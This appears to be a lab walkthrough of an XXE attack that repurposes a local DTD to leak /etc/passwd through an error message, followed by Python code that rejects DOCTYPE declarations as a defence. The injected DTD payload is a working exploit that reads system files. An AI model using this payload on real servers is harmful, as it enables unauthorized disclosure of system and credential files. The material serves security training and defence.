Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Insert the following parameter entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
This will import the Yelp DTD, then redefine the ISOamso entity, triggering an error message containing the contents of the /etc/passwd file.
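On the defensive side, the technique above depends entirely on the server accepting a DOCTYPE in the request body, so refusing any DTD closes it. The following is an added example, not part of the lab or its solution: `parse_stock_check`, `DoctypeForbidden` and the `productId`/`storeId` child elements are assumptions made for illustration.

```python
import xml.parsers.expat as expat


class DoctypeForbidden(ValueError):
    """Raised when a request body carries any DOCTYPE declaration."""


def parse_stock_check(body: bytes) -> dict:
    """Parse a stockCheck body into {child_name: text}, refusing any DTD."""
    parser = expat.ParserCreate()
    fields, stack, text = {}, [], []

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as the DOCTYPE is seen, before its internal subset
        # (where a local DTD would be imported and an entity redefined).
        raise DoctypeForbidden(f"DOCTYPE {name!r} rejected")

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        if len(stack) == 2:  # direct children of the root element
            fields[name] = "".join(text).strip()
        stack.pop()

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    # Defence in depth: never process parameter entities or external subsets.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(body, True)
    return fields


# Constructed sample bodies (element names below stockCheck are assumed).
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE message [\n'
            b'<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">\n'
            b'%local_dtd;\n]>\n'
            b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')

if __name__ == "__main__":
    print(parse_stock_check(BENIGN))
    try:
        parse_stock_check(WITH_DTD)
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```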